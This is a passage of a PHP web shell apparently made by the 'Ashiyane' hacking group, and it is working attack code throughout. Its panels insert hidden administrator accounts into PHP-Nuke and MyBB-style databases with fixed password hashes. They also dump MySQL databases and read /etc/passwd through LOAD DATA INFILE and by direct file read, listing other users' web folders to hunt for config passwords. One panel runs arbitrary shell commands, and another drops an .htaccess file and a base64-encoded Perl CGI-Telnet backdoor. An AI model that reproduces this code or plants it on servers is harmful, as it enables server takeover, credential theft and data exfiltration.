  2079. <tr><td>Admin Username:</td>
  2080. <td><input name="admin" size="30" value="admin"></td></tr>
  2081. <tr><td>Admin Password: </td>
  2082. <td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
  2083. <tr><td>Admin Email:</td>
  2084. <td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
  2085. </table>
  2086. <input value="Change" name="submit" type="submit">
  2087. </form>
  2088.  
  2089. <?php
  2090.  
  2091.     if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
  2092.    
  2093.             $localhost = $_POST['localhost'];
  2094.             $database = $_POST['database'];
  2095.             $username = $_POST['username'];
  2096.             $password = $_POST['password'];
  2097.             $admin = $_POST['admin'];
  2098.             $email = $_POST['email'];
  2099.             $prefix = $_POST['prefix'];
  2100.             @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2101.             @mysql_select_db($database) or die(mysql_error());
  2102.             $result=@mysql_query("insert into ".$prefix."users (uid,username,password,salt,email,usergroup) values(null,'".$admin."','c93bfab2a4d210f8cbf8bc0fcfbba67b','ywza68lS','".$email."','4')") or die(mysql_error());
  2103.             if($result){
  2104.                 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> ";
  2105.                 }
  2106.         }
  2107.     }
  2108.    
  2109. if($cms=="phpnuke"){
  2110.    
  2111.     ?>
  2112.     <br>
  2113.     <b>ADD NEW ADMIN PHP NUKE</b>
  2114.     <form action="?action=pwchanger&cms=phpnuke" method="POST">
  2115. <table>
  2116. <tr><td>Host :</td>
  2117. <td><input size="30" value="localhost" name="localhost" type="text"></td></tr>
  2118. <tr><td>Database :</td>
  2119. <td> <input size="30" value="" name="database" type="text"></td></tr>
  2120. <tr><td>Table Prefix :</td>
  2121. <td><input size="30" value="" name="prefix" type="text"></td></tr>
  2122. <tr><td>Username : </td>
  2123. <td> <input size="30" value="" name="username" type="text"></td></tr>
  2124. <tr><td>Password :</td>
  2125. <td> <input size="30" value="" name="password" type="text"></td></tr>
  2126. <tr><td>Admin Username:</td>
  2127. <td><input name="admin" size="30" value="admin"></td></tr>
  2128. <tr><td>Admin Password: </td>
  2129. <td><input name="pass" size="30" value="ashiyane" disabled /></td></tr>
  2130. <tr><td>Admin Email:</td>
  2131. <td><input name="email" size="30" value="info@ashiyane.ir"></td></tr>
  2132. </table>
  2133. <input value="Change" name="submit" type="submit">
  2134. </form>
  2135.    
  2136.     <?php
  2137.     if (isset($_POST['submit']) && $_POST['submit'] == 'Change'){
  2138.     $localhost = $_POST['localhost'];
  2139.             $database = $_POST['database'];
  2140.             $username = $_POST['username'];
  2141.             $password = $_POST['password'];
  2142.             $admin = $_POST['admin'];
  2143.             $email = $_POST['email'];
  2144.             $prefix = $_POST['prefix'];
  2145.             @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2146.             @mysql_select_db($database) or die(mysql_error());
  2147.             @mysql_connect($localhost,$username,$password) or die(mysql_error());
  2148.             @mysql_select_db($database) or die(mysql_error());
  2149.             $result=@mysql_query("insert into ".prefix."_authors(aid,name,email,pwd) values('$admin','God','$email','dfcaf717b6731a6f62baabad524a8517')") or die(mysql_error());
  2150.             if($result){
  2151.                 echo "<center><br><b><script>alert('".$admin." is created successfully.')</script></b></center> ";
  2152.             }
  2153.     }
  2154.    
  2155. }
  2156. }
  2157. }
  2158.    
  2159.     //sql connector ~ by Mast3r 0mid
  2160.     if($action=="sql"){
  2161.         echo "<style>#sql{background: #A81F1F}</style>";
  2162.    
  2163. $pwd    = realpath(".")."\\";
  2164.         function backup_tables($host,$user,$pass,$name,$tables = '*')
  2165.         {
  2166.  
  2167.             $link = mysql_connect($host,$user,$pass);
  2168.             mysql_select_db($name,$link);
  2169.  
  2170.             //get all of the tables
  2171.             if($tables == '*')
  2172.             {
  2173.                 $tables = array();
  2174.                 $result = mysql_query('SHOW TABLES');
  2175.                 while($row = mysql_fetch_row($result))
  2176.                 {
  2177.                     $tables[] = $row[0];
  2178.                 }
  2179.             }
  2180.             else
  2181.             {
  2182.                 $tables = is_array($tables) ? $tables : explode(',',$tables);
  2183.             }
  2184.  
  2185.             //cycle through
  2186.             foreach($tables as $table)
  2187.             {
  2188.                 $result = mysql_query('SELECT * FROM '.$table);
  2189.                 $num_fields = mysql_num_fields($result);
  2190.  
  2191.                 $return= 'DROP TABLE '.$table.';';
  2192.                 $row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
  2193.                 $return.= "\n\n".$row2[1].";\n\n";
  2194.  
  2195.                 for ($i = 0; $i < $num_fields; $i++)
  2196.                 {
  2197.                     while($row = mysql_fetch_row($result))
  2198.                     {
  2199.                         $return.= 'INSERT INTO '.$table.' VALUES(';
  2200.                         for($j=0; $j<$num_fields; $j++)
  2201.                         {
  2202.                             $row[$j] = addslashes($row[$j]);
  2203.                             $row[$j] = ereg_replace("\n","\\n",$row[$j]);
  2204.                             if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
  2205.                             if ($j<($num_fields-1)) { $return.= ','; }
  2206.                         }
  2207.                         $return.= ");\n";
  2208.                     }
  2209.                 }
  2210.                 $return.="\n\n\n";
  2211.             }
  2212.  
  2213.             //save file
  2214.             $handle = fopen('db-backup'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');
  2215.             fwrite($handle,$return);
  2216.  
  2217.  
  2218.             fclose($handle);
  2219.         }
  2220.  
  2221.  
  2222. if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
  2223.                             {
  2224.  
  2225.  
  2226.  
  2227.                             $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport'];    
  2228.                             if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass))
  2229.                                 {
  2230.                                 $msg = "";
  2231.                                 $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">";
  2232.                                 $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport;
  2233.                                 $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;<a href=\"?action=sql&y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;\">[ databases ]</a>";
  2234.                                 if(isset($_GET['db']))
  2235.                                     $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;</span>&nbsp;&nbsp;
  2236.                                     <a href=\"?action=sql&y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>";
  2237.                                 if(isset($_GET['table']))
  2238.                                     $msg .= "&nbsp;&nbsp;<span class=\"gaya\">-&gt;
  2239.                                     </span>&nbsp;&nbsp;
  2240.                                     <a href=\"?action=sql&y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>";
  2241.                                     $msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";
  2242.                                     $msg .= "</div>";
  2243.                                     echo $msg;
  2244.                                 if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery'])))
  2245.                             {
  2246.                             $db = $_GET['db'];
  2247.  
  2248.  
  2249.                                 echo "<a href=\"?action=sql&y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;dump\">"."<input type='button' value='Dump Current DB'>"."</a>";
  2250.  
  2251.                                 if(isset($_GET['dump'])){
  2252.                                     backup_tables($sqlhost,$sqluser,$sqlpass,$db);
  2253.                                         echo "Successully Dumped.";
  2254.  
  2255.  
  2256.                                 }
  2257.                                     $query = "DROP TABLE IF EXISTS Newbie3viLc063s0_table;
  2258.                                     \nCREATE TABLE `Ashiyane Digital Security Team` ( `file` LONGBLOB NOT NULL );
  2259.                                     \nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE Mast3r_table;SELECT * FROM Ashiyane_table;
  2260.                                     \nDROP TABLE IF EXISTS Ashiyane_table;";
  2261.                                     $msg = "<div style=\"width:99%;padding:0 10px;\">
  2262.                                     <form action=\"?\" method=\"get\">
  2263.                                     <input type=\"hidden\" name=\"action\" value=\"sql\" />
  2264.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  2265.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  2266.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  2267.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  2268.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  2269.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  2270.                                         <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  2271.                                         <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p>
  2272.                                         <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  2273.                                     </form>
  2274.                                 </div> ";
  2275.                                         $tables = array();
  2276.                                         $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".htmlspecialchars($db)."</th></tr>";
  2277.                                         $hasil = @mysql_list_tables($db,$con);
  2278.                             while(list($table) = @mysql_fetch_row($hasil))
  2279.                                 { @array_push($tables,$table); }
  2280.                             @sort($tables);
  2281.                             foreach($tables as $table)
  2282.                                 {
  2283.                                 $msg .= "<tr><td><a href=\"?action=sql&y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."\">$table</a></td></tr>";
  2284.                                 }
  2285.                             $msg .= "</table>";
  2286.                             }
  2287.                         elseif(isset($_GET['table']) && (!isset($_GET['sqlquery'])))
  2288.                             {
  2289.                             $db = $_GET['db'];
  2290.                             $table = $_GET['table'];
  2291.                             $query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";
  2292.                             $msgq = "<div style=\"width:99%;padding:0 10px;\">
  2293.                                     <form action=\"?\" method=\"get\">
  2294.                                     <input type=\"hidden\" name=\"action\" value=\"sql\" />
  2295.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  2296.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  2297.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  2298.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  2299.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  2300.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  2301.                                         <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  2302.                                         <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  2303.                                         <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  2304.                                         <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  2305.                                     </form>
  2306.                                 </div> ";
  2307.                             $columns = array();
  2308.                             $msg = "<table class=\"explore\" style=\"width:99%;\">";
  2309.                             $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);
  2310.                             while(list($column) = @mysql_fetch_row($hasil))
  2311.                                 {
  2312.                                 $msg .= "<th>$column</th>"; $kolum = $column;
  2313.                                 }
  2314.                             $msg .= "</tr>";
  2315.                             $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
  2316.                             list($total) = mysql_fetch_row($hasil);
  2317.                             if(isset($_GET['z'])) $page = (int) $_GET['z'];
  2318.                             else $page = 1;
  2319.                             $pagenum = 100;
  2320.                             $totpage = ceil($total / $pagenum);
  2321.                             $start = (($page - 1) * $pagenum);
  2322.                             $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
  2323.                             while($datas = @mysql_fetch_assoc($hasil))
  2324.                                 {
  2325.                                 $msg .= "<tr>";
  2326.                                 foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; }
  2327.                                 $msg .= "</tr>";
  2328.                                 }
  2329.                             $msg .= "</table>";
  2330.                             $head = "<div style=\"padding:10px 0 0 6px;\">
  2331.                                     <form action=\"?\" method=\"get\">
  2332.                                     <input type=\"hidden\" name=\"action\" value=\"sql\" />
  2333.                                         <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  2334.                                         <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  2335.                                         <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  2336.                                         <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  2337.                                         <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  2338.                                         <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  2339.                                         <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  2340.                                         <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  2341.                                         Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  2342.                             for($i = 1;$i <= $totpage;$i++)
  2343.                                 {
  2344.                                 $head .= "<option value=\"".$i."\">".$i."</option>";
  2345.                                 if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>";
  2346.                                 }
  2347.                             $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
  2348.                             $msg = $msgq.$head.$msg;
  2349.                         }
  2350.                     elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != ""))
  2351.                         {
  2352.                         $db = $_GET['db'];
  2353.                         $query = $_GET['sqlquery'];
  2354.                         $msg = "<div style=\"width:99%;padding:0 10px;\">
  2355.                                 <form action=\"?\" method=\"get\">
  2356.                                 <input type=\"hidden\" name=\"action\" value=\"sql\" />
  2357.                                     <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  2358.                                     <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  2359.                                     <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  2360.                                     <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  2361.                                     <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  2362.                                     <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  2363.                                     <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  2364.                                     <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  2365.                                     <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  2366.                                 </form>
  2367.                             </div> ";
  2368.                         @mysql_select_db($db);
  2369.                         $querys = explode(";",$query);
  2370.                         foreach($querys as $query)
  2371.                             {
  2372.                             if(trim($query) != "")
  2373.                                 {
  2374.                                 $hasil = mysql_query($query);
  2375.                                 if($hasil)
  2376.                                     {
  2377.                                     $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;
  2378.                                         <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
  2379.                                     $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
  2380.                                     for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";
  2381.                                     $msg .= "</tr>";
  2382.                                     for($i=0;$i<@mysql_num_rows($hasil);$i++)
  2383.                                         {
  2384.                                         $rows=@mysql_fetch_array($hasil);
  2385.                                         $msg .= "<tr>";
  2386.                                         for($j=0;$j<@mysql_num_fields($hasil);$j++)
  2387.                                             {
  2388.                                             if($rows[$j] == "") $dataz = "&nbsp;";
  2389.                                             else $dataz = $rows[$j];
  2390.                                             $msg .= "<td>".$dataz."</td>";
  2391.                                             }
  2392.                                         $msg .= "</tr>";
  2393.                                         }
  2394.                                     $msg .= "</table>";
  2395.                                     }
  2396.                                 else
  2397.                                     $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";
  2398.                                 }
  2399.                             }
  2400.                         }
  2401.                     else
  2402.                         {
  2403.                         $query = "SHOW PROCESSLIST;\n
  2404.                             SHOW VARIABLES;\n
  2405.                             SHOW STATUS;";
  2406.                         $msg = "<div style=\"width:99%;padding:0 10px;\">
  2407.                             <form action=\"?\" method=\"get\">
  2408.                             <input type=\"hidden\" name=\"action\" value=\"sql\" />
  2409.                                 <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  2410.                                 <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  2411.                                 <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  2412.                                 <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  2413.                                 <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  2414.                                 <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  2415.                                 <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  2416.                                 <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  2417.                                 <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go\" /></p>
  2418.                             </form>
  2419.                             </div> ";
  2420.                         $dbs = array();
  2421.                         $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  2422.                         $hasil = @mysql_list_dbs($con);
  2423.                         while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); }
  2424.                         @sort($dbs);
  2425.                         foreach($dbs as $db)
  2426.                             {
  2427.                             $msg .= "<tr><td><a href=\"?action=sql&y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>";
  2428.                             }
  2429.                         $msg .= "</table>";
  2430.                         }
  2431.                     @mysql_close($con);
  2432.                     }
  2433.                 else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
  2434.                 echo $msg;
  2435.                 }
  2436.                
  2437.                 else {
  2438.                 ?>
  2439.                
  2440.                 <form action="?" method="get">
  2441.                 <input type="hidden" name="action" value="sql" />
  2442.                 <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
  2443.                 <input type="hidden" name="x" value="mysql" />
  2444.                 <table class="tabnet" style="width:300px;">
  2445.                     <tr>
  2446.                         <th colspan="2">Connect to mySQL server</th>
  2447.                     </tr>
  2448.                     <tr>
  2449.                         <td>&nbsp;&nbsp;Host</td>
  2450.                         <td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td>
  2451.                     </tr>
  2452.                     <tr>
  2453.                         <td>&nbsp;&nbsp;Username</td>
  2454.                         <td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td>
  2455.                     </tr>
  2456.                     <tr>
  2457.                         <td>&nbsp;&nbsp;Password</td>
  2458.                         <td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="" /></td>
  2459.                     </tr>
  2460.                     <tr>
  2461.                         <td>&nbsp;&nbsp;Port</td>
  2462.                         <td><input style="width:80px;" class="inputz" type="number" name="sqlport" value="3306" min="1" max="65535"/>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td>
  2463.                     </tr>
  2464.                 </table>
  2465.                 </form>
  2466.                
  2467. <?php
  2468. } //end sql connector
  2469.  
  2470.  
  2471.  
  2472.     }
  2473.     //terminal ~ by Mast3r 0mid
  2474.     if($action=="terminal"){
  2475.         echo "<style>#terminal{background: #A81F1F}</style>";
  2476.  
  2477. $user   = @get_current_user();
  2478. $prompt = $user." &gt;";
  2479. $pwd    = realpath(".")."\\";
  2480. function exe($cmd)
  2481.     {
  2482.         if(function_exists('system'))
  2483.             {
  2484.             @ob_start();
  2485.             @system($cmd);
  2486.             $buff = @ob_get_contents();
  2487.             @ob_end_clean();
  2488.             return $buff;
  2489.             }
  2490.         elseif(function_exists('exec'))
  2491.             {
  2492.             @exec($cmd,$results);
  2493.             $buff = "";
  2494.             foreach($results as $result)
  2495.                 { $buff .= $result; }
  2496.             return $buff;
  2497.             }
  2498.         elseif(function_exists('passthru'))
  2499.             {
  2500.             @ob_start();
  2501.             @passthru($cmd);
  2502.             $buff = @ob_get_contents();
  2503.             @ob_end_clean();
  2504.             return $buff;
  2505.             }
  2506.         elseif(function_exists('shell_exec'))
  2507.             {
  2508.             $buff = @shell_exec($cmd);
  2509.             return $buff;
  2510.             }
  2511.     }
  2512. ?>
  2513. <CENTER>
  2514. <form action="?action=terminal&CMD=shell#down" method="post">
  2515.         <table class="cmdbox">
  2516.             <tr>
  2517.                 <td colspan="2">
  2518.                 <a name="down"></a>
  2519.                 <textarea style="width: 1000px; height: 400px;color: #FFF;background-color: #000;border: 2px solid #CE3F3F;font: 9pt Monospace,"Courier New";" class="output" readonly=""> $<?php if(isset($_POST['submitcmd'])) { echo htmlspecialchars($_POST['cmd'])."\n";}?><?php if(isset($_POST['submitcmd'])) { echo @exe($_POST['cmd']); } ?> </textarea>
  2520.                 </td>
  2521.             </tr>
  2522.             <tr>
  2523.                 <td colspan="2"><?php echo $prompt; ?>
  2524.                 <input onMouseOver="this.focus();" id="cmd" class="input" type="text" name="cmd" style="width:60%;" value="" />
  2525.                 <input class="inputbutn" type="submit" value="Execute !" name="submitcmd" style="width:12%;" />
  2526.                 </td>
  2527.             </tr>
  2528.         </table>
  2529.     </form></CENTER>
  2530.    
  2531.     <?php
  2532.         //end terminal
  2533.     }
  2534.     if($action=="basedir"){
  2535.         echo "<style>#basedir{background: #A81F1F}</style>";
  2536. echo '<div style="text-align:left">';
  2537. ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<b>Error: safe_mode is on</b>');
  2538. set_time_limit(0);
  2539. @$passwd = fopen('/etc/passwd','r');
  2540. if (!$passwd) { die('<b> <center><font color="#FFFFFF">Error : coudn`t read /etc/passwd</font></center></b>'); }
  2541. $pub = array();
  2542. $users = array();
  2543. $conf = array();
  2544. $i = 0;
  2545. while(!feof($passwd))
  2546. {
  2547. $str = fgets($passwd);
  2548. if ($i > 35)
  2549. {
  2550. $pos = strpos($str,':');
  2551. $username = substr($str,0,$pos);
  2552. $dirz = '/home/'.$username.'/public_html/';
  2553. if (($username != ''))
  2554. {
  2555. if (is_readable($dirz))
  2556. {
  2557. array_push($users,$username);
  2558. array_push($pub,$dirz);
  2559. }
  2560. }
  2561. }
  2562. $i++;
  2563. }
  2564. echo '<br><br>';
  2565. echo "<b><font color=\"#00A220\">Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br /></font></b>";
  2566. echo "<b><font color=\"#00A220\">Founded ".sizeof($pub)." readable public_html directories\n"."<br /></font></b>";
  2567. echo "<b><font color=\"#FFFFFF\">Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
  2568. foreach ($users as $user)
  2569. {
  2570. $p4th = "/home/$user/public_html/";
  2571. echo "<form method=get><span>Change Dir : <b><font color=\"#CE3F3F\">$user</font></b></span><br><input type='hidden' name='action' value='explorer'><input type=text name=dir value='$p4th'><input type=submit value='>>'></form><br>";
  2572. }
  2573. echo '<br><br></b>';
  2574. echo '</div>';
  2575.  
  2576.    
  2577.     }
  2578.    
  2579.    
  2580.     if($action=="cgiashiyane"){
  2581.         echo "<style>#cgiashiyane{background: #A81F1F}</style>";
  2582. if (!file_exists("cgiashiyane") && !is_dir("cgiashiyane")) {
  2583.    mkdir('cgiashiyane',0755);        
  2584. }
  2585. chdir('cgiashiyane');
  2586. $ashiyane1 = '.htaccess';
  2587. $ashiyane2 = "$ashiyane1";
  2588. $ashiyane3 = fopen ($ashiyane2 ,'w') or die ('ERROR!!!');
  2589. $ashiyane4 = 'Options FollowSymLinks MultiViews Indexes ExecCGI
  2590. AddType application/x-httpd-cgi .ashiyane
  2591. AddHandler cgi-script .ashiyane
  2592. AddHandler cgi-script .ashiyane';
  2593. fwrite ( $ashiyane3 ,$ashiyane4 ) ;
  2594. fclose ($ashiyane3);
  2595. $ashiyane5 = " IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBDb3B5cmlnaHQgYW5kIExpY2VuY2UNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ0dJLVRlbG5ldCBWZXJzaW9uIDEuMCBmb3IgTlQgYW5kIFVuaXggOiBSdW4gQ29tbWFuZHMgb24geW91ciBXZWIgU2VydmVyDQojDQojIENvcHlyaWdodCAoQykgMjAwMSBSb2hpdGFiIEJhdHJhDQojIFBlcm1pc3Npb24gaXMgZ3JhbnRlZCB0byB1c2UsIGRpc3RyaWJ1dGUgYW5kIG1vZGlmeSB0aGlzIHNjcmlwdCBzbyBsb25nDQojIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZSBpcyBsZWZ0IGludGFjdC4gSWYgeW91IG1ha2UgY2hhbmdlcyB0byB0aGUgc2NyaXB0DQojIHBsZWFzZSBkb2N1bWVudCB0aGVtIGFuZCBpbmZvcm0gbWUuIElmIHlvdSB3b3VsZCBsaWtlIGFueSBjaGFuZ2VzIHRvIGJlIG1hZGUNCiMgaW4gdGhpcyBzY3JpcHQsIHlvdSBjYW4gZS1tYWlsIG1lLg0KIw0KIyBBdXRob3I6IFJvaGl0YWIgQmF0cmENCiMgQXV0aG9yIGUtbWFpbDogcm9oaXRhYkByb2hpdGFiLmNvbQ0KIyBBdXRob3IgSG9tZXBhZ2U6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vDQojIFNjcmlwdCBIb21lcGFnZTogbWFpbHRvOlVOSVRYX1RFQU1ASE9UTUFJTC5DT00NCiMgUHJvZHVjdCBTdXBwb3J0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL3N1cHBvcnQvDQojIERpc2N1c3Npb24gRm9ydW06IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vZGlzY3Vzcy8NCiMgTWFpbGluZyBMaXN0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL21saXN0Lw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEluc3RhbGxhdGlvbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUbyBpbnN0YWxsIHRoaXMgc2NyaXB0DQojDQojIDEuIE1vZGlmeSB0aGUgZmlyc3QgbGluZSAiIyEvdXNyL2Jpbi9wZXJsIiB0byBwb2ludCB0byB0aGUgY29ycmVjdCBwYXRoIG9uDQojICAgIHlvdXIgc2VydmVyLiBGb3IgbW9zdCBzZXJ2ZXJzLCB5b3UgbWF5IG5vdCBuZWVkIHRvIG1vZGlmeSB0aGlzLg0KIyAyLiBDaGFuZ2UgdGhlIHBhc3N3b3JkIGluIHRoZSBDb25maWd1cmF0aW9uIHNlY3Rpb24gYmVsb3cuDQojIDMuIElmIHlvdSdyZSBydW5uaW5nIHRoZSBzY3JpcHQgdW5kZXIgV2luZG93cyBOVCwgc2V0ICRXaW5OVCA9IDEgaW4gdGhlDQojICAgIENvbmZpZ3VyYXRpb24gU2VjdGlvbiBiZWxvdy4NCiMgNC4gVXBsb2FkIHRoZSBzY3JpcHQgdG8gYSBkaXJlY3Rvcnkgb24geW91ciBzZXJ2ZXIgd2hpY2ggaGFzIHBlcm1pc3Npb25zIHRvDQojICAgIGV4ZWN1dGUgQ0dJIHNjcmlwdHMuIFRoaXMgaXMgdXN1YWxseSBjZ2ktYmluLiBNYWtlIHN1cmUgdGhhdCB5b3UgdXBsb2FkDQojICAgIHRoZSBzY3JpcHQgaW4gQVNDSUkgbW9kZS4NCiMgNS4gQ2hhbmdlIHRoZSBwZXJtaXNzaW9uIChDSE1PRCkgb2YgdGhlIHNjcmlwdCB0byA3NTUuDQojIDYuIE9wZW4gdGhlIHNjcmlwdCBpbiB5b3V